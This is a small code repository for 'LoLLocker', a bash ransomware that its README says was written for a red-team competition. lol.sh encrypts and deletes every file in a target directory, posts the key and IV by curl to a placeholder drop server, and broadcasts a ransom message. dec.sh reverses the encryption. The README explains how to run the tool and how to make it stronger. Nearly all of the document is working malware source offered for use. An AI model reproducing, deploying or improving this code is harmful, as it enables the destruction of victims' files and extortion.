├── dec.sh
├── lol.sh
└── README.md


/dec.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | if [ $# -ne 3 ]
 4 | then
 5 | 	echo "Usage: ./dec.sh [pass] [iv] [dirwalk]"
 6 | else
 7 | 	pass=$1
 8 | 	iv=$2
 9 | 	dirwalk=$3
10 | 	files=`find $dirwalk -iname "*.lol"`	
11 | 	for f in $files
12 | 	do
13 | 		outfile=`echo $f | sed 's/.lol//'`
14 | 		echo "Decrypting ${f}, outfile is ${outfile}"
15 | 		`openssl enc -d -aes-256-cbc -a -in $f -iv $iv -pass pass:$pass -out $outfile`
16 | 		if [ $? -eq 0 ] 
17 | 		then
18 | 			rm $f 
19 | 		fi
20 | 	done
21 | fi
22 | 


--------------------------------------------------------------------------------
/lol.sh:
--------------------------------------------------------------------------------
 1 | if [ $# -ne 2 ]
 2 | then
 3 | 	echo "Usage: ./lol.sh [pw] [dir1]"
 4 | else
 5 | 	iv=`cat /dev/urandom | tr -cd 'A-F0-9' | head -c 32`
 6 | 	pass=$1
 7 | 	dirwalk=$2
 8 | 	white_list=( cat wall echo bash ifconfig ls chmod rm openssl )
 9 | 	re="$(printf '%s\n' "${white_list[@]}" | paste -sd '|')"
10 | 	files=`find $dirwalk -type f`
11 | 	curl --data "key=$pass&iv=$iv&msg=msg" https://droppersite.com
12 | 	for f in $files
13 | 	do
14 | 		if [[ ! $f =~ $re ]]; then
15 | 			outfile=$f.lol
16 | 			`openssl enc -aes-256-cbc -a -salt -in $f -out $outfile -pass pass:$pass -iv $iv`
17 | 			rm $f
18 | 		fi
19 | 	done
20 | 	echo "Yo! You've been infected by LOLLOCKER. Come schmooze redteam for the password! ;) ;)" | wall
21 | fi
22 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | LoLLocker
 2 | ===
 3 | 
 4 | Bash based cryptolocker
 5 | 
 6 | I wrote this in a hack/prep night to for the [information security talent search](http://ists.sparsa.org/) (ISTS) @ Rochester Institute of Technology.
 7 | 
 8 | Please improve/learn from this, its academic code and in no way do I endorse using this for evil.
 9 | 
10 | Run
11 | ===
12 | 
13 | Change URL on line 11 from https://droppersite.com to your serv.
14 | 
15 | Things to note:
16 | 
17 | I have a white_list to make sure you dont encrypt everything, it encrypts everything in the target directory. You can instead substitute this for a file extension list and only encrypt those extensions and filter through sed
18 | 
19 | Encrypt
20 | ==
21 | 
22 | ```./lol.sh password targetdir```
23 | 
24 | Decrypt
25 | ==
26 | 
27 | ```./dec.sh password iv targetdir```
28 | 
29 | Things it doesnt do
30 | ===
31 | 
32 | Ideally, port a pub key to encrypt the symmetric key:IV to send that as one parameter when you encrypt everything.
33 | 
34 | Also, separate IV per file, and better encrypted file detection (magic values prepended/appended instead of an extension is ideal)
35 | 
36 | 


--------------------------------------------------------------------------------